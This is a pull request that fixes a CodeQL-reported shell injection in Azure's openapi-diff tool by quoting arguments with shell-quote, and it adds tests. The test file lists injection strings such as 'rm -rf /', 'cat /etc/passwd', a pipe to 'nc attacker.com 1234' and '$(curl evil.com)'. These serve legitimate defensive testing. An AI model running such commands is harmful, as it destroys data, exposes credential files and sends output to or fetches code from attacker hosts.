### PR TITLE
openapi-diff: fixed issue reported by CodeQL

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1,5 +1,9 @@
 # Changelog
 
+## 0.10.14 2025-06-19
+
+- escaped the input string when construct the autorest command
+
 ## 0.10.5 Released on 2024-02-16
 
 - update source map version from 0.7.3 to 0.7.4 so that it works with Node 18.

--- a/package-lock.json
+++ b/package-lock.json
@@ -1,12 +1,12 @@
 {
   "name": "@azure/oad",
-  "version": "0.10.13",
+  "version": "0.10.14",
   "lockfileVersion": 3,
   "requires": true,
   "packages": {
     "": {
       "name": "@azure/oad",
-      "version": "0.10.13",
+      "version": "0.10.14",
       "license": "MIT",
       "dependencies": {
         "@ts-common/fs": "^0.2.0",
@@ -26,6 +26,7 @@
         "minimist": "^1.2.8",
         "request": "^2.88.0",
         "set-value": "^4.1.0",
+        "shell-quote": "^1.8.3",
         "source-map": "^0.7.4",
         "tslib": "^2.6.3",
         "winston": "^3.13.0",
@@ -43,6 +44,7 @@
         "@types/json-pointer": "^1.0.30",
         "@types/node": "^18.11.9",
         "@types/request": "^2.48.1",
+        "@types/shell-quote": "^1.7.5",
         "@types/yargs": "^13.0.0",
         "eslint": "^8.57.0",
         "jest": "^29.7.0",
@@ -1522,6 +1524,13 @@
         "@types/tough-cookie": "*",
         "form-data": "^2.5.0"
       }
+    },
+    "node_modules/@types/shell-quote": {
+      "version": "1.7.5",
+      "resolved": "https://registry.npmjs.org/@types/shell-quote/-/shell-quote-1.7.5.tgz",
+      "integrity": "sha512-+UE8GAGRPbJVQDdxi16dgadcBfQ+KG2vgZhV1+3A1XmHbmwcdwhCUwIdy+d3pAGrbvgRoVSjeI9vOWyq376Yzw==",
+      "dev": true,
+      "license": "MIT"
     },
     "node_modules/@types/stack-utils": {
       "version": "2.0.3",
@@ -5914,6 +5923,18 @@
       "license": "MIT",
       "engines": {
         "node": ">=8"
+      }
+    },
+    "node_modules/shell-quote": {
+      "version": "1.8.3",
+      "resolved": "https://registry.npmjs.org/shell-quote/-/shell-quote-1.8.3.tgz",
+      "integrity": "sha512-ObmnIF4hXNg1BqhnHmgbDETF8dLPCggZWBjkQfhZpbszZnYur5DUljTcCHii5LC3J5E0yeO/1LIMyH+UvHQgyw==",
+      "license": "MIT",
+      "engines": {
+        "node": ">= 0.4"
+      },
+      "funding": {
+        "url": "https://github.com/sponsors/ljharb"
       }
     },
     "node_modules/side-channel": {

--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "@azure/oad",
-  "version": "0.10.13",
+  "version": "0.10.14",
   "author": {
     "name": "Microsoft Corporation",
     "email": "azsdkteam@microsoft.com",
@@ -26,6 +26,7 @@
     "minimist": "^1.2.8",
     "request": "^2.88.0",
     "set-value": "^4.1.0",
+    "shell-quote": "^1.8.3",
     "source-map": "^0.7.4",
     "tslib": "^2.6.3",
     "winston": "^3.13.0",
@@ -40,6 +41,7 @@
     "@types/json-pointer": "^1.0.30",
     "@types/node": "^18.11.9",
     "@types/request": "^2.48.1",
+    "@types/shell-quote": "^1.7.5",
     "@types/yargs": "^13.0.0",
     "eslint": "^8.57.0",
     "jest": "^29.7.0",
@@ -80,7 +82,9 @@
   "jest": {
     "preset": "ts-jest",
     "collectCoverage": true,
-    "testMatch": ["**/*[tT]est.ts"],
+    "testMatch": [
+      "**/*[tT]est.ts"
+    ],
     "testTimeout": 100000
   },
   "scripts": {

--- a/src/lib/validators/openApiDiff.ts
+++ b/src/lib/validators/openApiDiff.ts
@@ -10,6 +10,7 @@ import JSON_Pointer from "json-pointer"
 import * as jsonRefs from "json-refs"
 import * as os from "os"
 import * as path from "path"
+import { quote } from "shell-quote"
 import * as sourceMap from "source-map"
 import * as util from "util"
 import { log } from "../util/logging"
@@ -232,10 +233,10 @@ export class OpenApiDiff {
     const outputFilePath = path.join(outputFolder, `${outputFileName}.json`)
     const outputMapFilePath = path.join(outputFolder, `${outputFileName}.map`)
     const autoRestCmd = tagName
-      ? `${this.autoRestPath()} ${swaggerPath} --v2 --tag=${tagName} --output-artifact=swagger-document.json` +
-        ` --output-artifact=swagger-document.map --output-file=${outputFileName} --output-folder=${outputFolder}`
-      : `${this.autoRestPath()} --v2 --input-file=${swaggerPath} --output-artifact=swagger-document.json` +
-        ` --output-artifact=swagger-document.map --output-file=${outputFileName} --output-folder=${outputFolder}`
+      ? `${this.autoRestPath()} ${quote([swaggerPath])} --v2 --tag=${quote([tagName])} --output-artifact=swagger-document.json` +
+        ` --output-artifact=swagger-document.map --output-file=${quote([outputFileName])} --output-folder=${quote([outputFolder])}`
+      : `${this.autoRestPath()} --v2 --input-file=${quote([swaggerPath])} --output-artifact=swagger-document.json` +
+        ` --output-artifact=swagger-document.map --output-file=${quote([outputFileName])} --output-folder=${quote([outputFolder])}`
 
     log.debug(`Executing: "${autoRestCmd}"`)
 

--- a/src/lib/validators/openApiDiff.ts
+++ b/src/lib/validators/openApiDiff.ts
@@ -232,6 +232,7 @@ export class OpenApiDiff {
     const outputFolder = await fs.promises.mkdtemp(path.join(os.tmpdir(), "oad-"))
     const outputFilePath = path.join(outputFolder, `${outputFileName}.json`)
     const outputMapFilePath = path.join(outputFolder, `${outputFileName}.map`)
+    // quote behavior is validated in shellEscapingTest.ts
     const autoRestCmd = tagName
       ? `${this.autoRestPath()} ${quote([swaggerPath])} --v2 --tag=${quote([tagName])} --output-artifact=swagger-document.json` +
         ` --output-artifact=swagger-document.map --output-file=${quote([outputFileName])} --output-folder=${quote([outputFolder])}`

--- a/src/lib/validators/openApiDiff.ts
+++ b/src/lib/validators/openApiDiff.ts
@@ -177,7 +177,7 @@ export class OpenApiDiff {
       const result = path.join(__dirname, "..", "..", "..", "node_modules", "autorest", "dist", "app.js")
       if (fs.existsSync(result)) {
         log.silly(`Found autoRest:${result} `)
-        return `node ${escape(result)}`
+        return `node ${escapeShellArg(result)}`
       }
     }
 
@@ -186,7 +186,7 @@ export class OpenApiDiff {
       const result = path.join(__dirname, "..", "..", "..", "..", "..", "autorest", "dist", "app.js")
       if (fs.existsSync(result)) {
         log.silly(`Found autoRest:${result} `)
-        return `node ${escape(result)}`
+        return `node ${escapeShellArg(result)}`
       }
     }
 
@@ -195,7 +195,7 @@ export class OpenApiDiff {
       const result = path.resolve("node_modules/.bin/autorest")
       if (fs.existsSync(result)) {
         log.silly(`Found autoRest:${result} `)
-        return escape(result)
+        return escapeShellArg(result)
       }
     }
 
@@ -211,7 +211,7 @@ export class OpenApiDiff {
   public openApiDiffDllPath(): string {
     log.silly(`openApiDiffDllPath is being called`)
 
-    return escape(path.join(__dirname, "..", "..", "..", "dlls", "OpenApiDiff.dll"))
+    return escapeShellArg(path.join(__dirname, "..", "..", "..", "dlls", "OpenApiDiff.dll"))
   }
 
   /**

--- a/src/test/shellEscapingTest.ts
+++ b/src/test/shellEscapingTest.ts
@@ -26,21 +26,28 @@ test("shell escaping with quote function", () => {
 test("autorest command construction with dangerous inputs", () => {
   // Simulate the command construction logic from processViaAutoRest
   const autoRestPath = "/usr/bin/autorest"
-  
+
   // Test with dangerous file paths
   const dangerousSwaggerPath = "/tmp/file;rm -rf /.json"
   const dangerousOutputFile = "output;evil&command"
   const dangerousTag = "tag$(evil)"
 
   // Build command like in processViaAutoRest with escaping
-  const autoRestCmd = autoRestPath + " " + quote([dangerousSwaggerPath]) + " --v2 --tag=" + quote([dangerousTag]) + " --output-artifact=swagger-document.json --output-artifact=swagger-document.map --output-file=" + quote([dangerousOutputFile])
+  const autoRestCmd =
+    autoRestPath +
+    " " +
+    quote([dangerousSwaggerPath]) +
+    " --v2 --tag=" +
+    quote([dangerousTag]) +
+    " --output-artifact=swagger-document.json --output-artifact=swagger-document.map --output-file=" +
+    quote([dangerousOutputFile])
 
   // Verify that dangerous parts are properly escaped/quoted
   // Files with spaces get quoted, dangerous chars get backslash-escaped
   assert.ok(autoRestCmd.includes("'/tmp/file;rm -rf /.json'")) // quoted because of spaces
   assert.ok(autoRestCmd.includes("output\\;evil\\&command")) // backslash-escaped
   assert.ok(autoRestCmd.includes("tag\\$\\(evil\\)")) // backslash-escaped
-  
+
   // Verify that the command structure is maintained
   assert.ok(autoRestCmd.includes("--v2"))
   assert.ok(autoRestCmd.includes("--tag="))
@@ -54,14 +61,15 @@ test("autorest command construction without tag", () => {
   const outputFolder = "/tmp/output folder"
 
   // Build command without tag (different structure)
-  const autoRestCmd = `${autoRestPath} --v2 --input-file=${quote([swaggerPath])} --output-artifact=swagger-document.json` +
+  const autoRestCmd =
+    `${autoRestPath} --v2 --input-file=${quote([swaggerPath])} --output-artifact=swagger-document.json` +
     ` --output-artifact=swagger-document.map --output-file=${quote([outputFile])} --output-folder=${quote([outputFolder])}`
 
   // Verify correct command structure for non-tagged case
   assert.ok(autoRestCmd.includes("--input-file="))
   assert.ok(!autoRestCmd.includes("--tag="))
   assert.ok(autoRestCmd.includes("--v2"))
-  
+
   // Verify spaces are properly quoted
   assert.ok(autoRestCmd.includes("'/tmp/test file.json'"))
   assert.ok(autoRestCmd.includes("'output file'"))
@@ -91,16 +99,16 @@ test("command injection prevention", () => {
 test("edge cases and special characters", () => {
   // Test empty string
   assert.strictEqual(quote([""]), "''")
-  
+
   // Test string with only spaces
   assert.strictEqual(quote(["   "]), "'   '")
-  
+
   // Test string with newlines
   const withNewlines = "file\nwith\nnewlines.json"
   const escapedNewlines = quote([withNewlines])
   // Should be safely handled
   assert.ok(typeof escapedNewlines === "string")
-  
+
   // Test unicode and special chars
   const unicodeFile = "файл.json"
   const escapedUnicode = quote([unicodeFile])

--- a/src/test/shellEscapingTest.ts
+++ b/src/test/shellEscapingTest.ts
@@ -1,0 +1,108 @@
+import * as assert from "assert"
+import { quote } from "shell-quote"
+
+// Test the shell-quote library integration to ensure our security fix works correctly
+test("shell escaping with quote function", () => {
+  // Test normal filenames (should not be escaped)
+  const normalFile = "simple-file.json"
+  const escapedNormal = quote([normalFile])
+  assert.strictEqual(escapedNormal, normalFile)
+
+  // Test filenames with spaces (should be quoted)
+  const fileWithSpaces = "file with spaces.json"
+  const escapedSpaces = quote([fileWithSpaces])
+  assert.strictEqual(escapedSpaces, "'file with spaces.json'")
+
+  // Test dangerous shell metacharacters (should be escaped)
+  const dangerousFile = "file;with&dangerous|chars$.json"
+  const escapedDangerous = quote([dangerousFile])
+  // shell-quote uses backslash escaping for certain characters
+  assert.ok(escapedDangerous.includes("\\;"))
+  assert.ok(escapedDangerous.includes("\\&"))
+  assert.ok(escapedDangerous.includes("\\|"))
+  assert.ok(escapedDangerous.includes("\\$"))
+})
+
+test("autorest command construction with dangerous inputs", () => {
+  // Simulate the command construction logic from processViaAutoRest
+  const autoRestPath = "/usr/bin/autorest"
+  
+  // Test with dangerous file paths
+  const dangerousSwaggerPath = "/tmp/file;rm -rf /.json"
+  const dangerousOutputFile = "output;evil&command"
+  const dangerousTag = "tag$(evil)"
+
+  // Build command like in processViaAutoRest with escaping
+  const autoRestCmd = autoRestPath + " " + quote([dangerousSwaggerPath]) + " --v2 --tag=" + quote([dangerousTag]) + " --output-artifact=swagger-document.json --output-artifact=swagger-document.map --output-file=" + quote([dangerousOutputFile])
+
+  // Verify that dangerous parts are properly escaped/quoted
+  // Files with spaces get quoted, dangerous chars get backslash-escaped
+  assert.ok(autoRestCmd.includes("'/tmp/file;rm -rf /.json'")) // quoted because of spaces
+  assert.ok(autoRestCmd.includes("output\\;evil\\&command")) // backslash-escaped
+  assert.ok(autoRestCmd.includes("tag\\$\\(evil\\)")) // backslash-escaped
+  
+  // Verify that the command structure is maintained
+  assert.ok(autoRestCmd.includes("--v2"))
+  assert.ok(autoRestCmd.includes("--tag="))
+  assert.ok(autoRestCmd.includes("--output-file="))
+})
+
+test("autorest command construction without tag", () => {
+  const autoRestPath = "/usr/bin/autorest"
+  const swaggerPath = "/tmp/test file.json"
+  const outputFile = "output file"
+  const outputFolder = "/tmp/output folder"
+
+  // Build command without tag (different structure)
+  const autoRestCmd = `${autoRestPath} --v2 --input-file=${quote([swaggerPath])} --output-artifact=swagger-document.json` +
+    ` --output-artifact=swagger-document.map --output-file=${quote([outputFile])} --output-folder=${quote([outputFolder])}`
+
+  // Verify correct command structure for non-tagged case
+  assert.ok(autoRestCmd.includes("--input-file="))
+  assert.ok(!autoRestCmd.includes("--tag="))
+  assert.ok(autoRestCmd.includes("--v2"))
+  
+  // Verify spaces are properly quoted
+  assert.ok(autoRestCmd.includes("'/tmp/test file.json'"))
+  assert.ok(autoRestCmd.includes("'output file'"))
+  assert.ok(autoRestCmd.includes("'/tmp/output folder'"))
+})
+
+test("command injection prevention", () => {
+  // Test various command injection attempts
+  const injectionAttempts = [
+    "file.json; rm -rf /",
+    "file.json && cat /etc/passwd",
+    "file.json | nc attacker.com 1234",
+    "file.json $(curl evil.com)",
+    "file.json `wget malware.com`",
+    "file.json & background-evil-command"
+  ]
+
+  injectionAttempts.forEach(attempt => {
+    const escaped = quote([attempt])
+    // Verify that the dangerous parts cannot be executed as separate commands
+    // They should either be quoted or have dangerous chars escaped
+    const hasDangerousUnescaped = /[^\\][;&|$`]/.test(escaped) && !escaped.includes("'")
+    assert.ok(!hasDangerousUnescaped, `Injection attempt not properly escaped: ${attempt} -> ${escaped}`)
+  })
+})
+
+test("edge cases and special characters", () => {
+  // Test empty string
+  assert.strictEqual(quote([""]), "''")
+  
+  // Test string with only spaces
+  assert.strictEqual(quote(["   "]), "'   '")
+  
+  // Test string with newlines
+  const withNewlines = "file\nwith\nnewlines.json"
+  const escapedNewlines = quote([withNewlines])
+  // Should be safely handled
+  assert.ok(typeof escapedNewlines === "string")
+  
+  // Test unicode and special chars
+  const unicodeFile = "файл.json"
+  const escapedUnicode = quote([unicodeFile])
+  assert.ok(escapedUnicode.includes("файл"))
+})


### PR DESCRIPTION
Issue link:
https://codeql.microsoft.com/issues/b36e4a94-e9b8-42d4-b881-60533c236314?copilot_promptid=E91B0CE9-0C1B-4AC2-8A46-33F49B67E058

**Summary**
- Use shell-quote to escape the input string when constructing the autorest command
- Added tests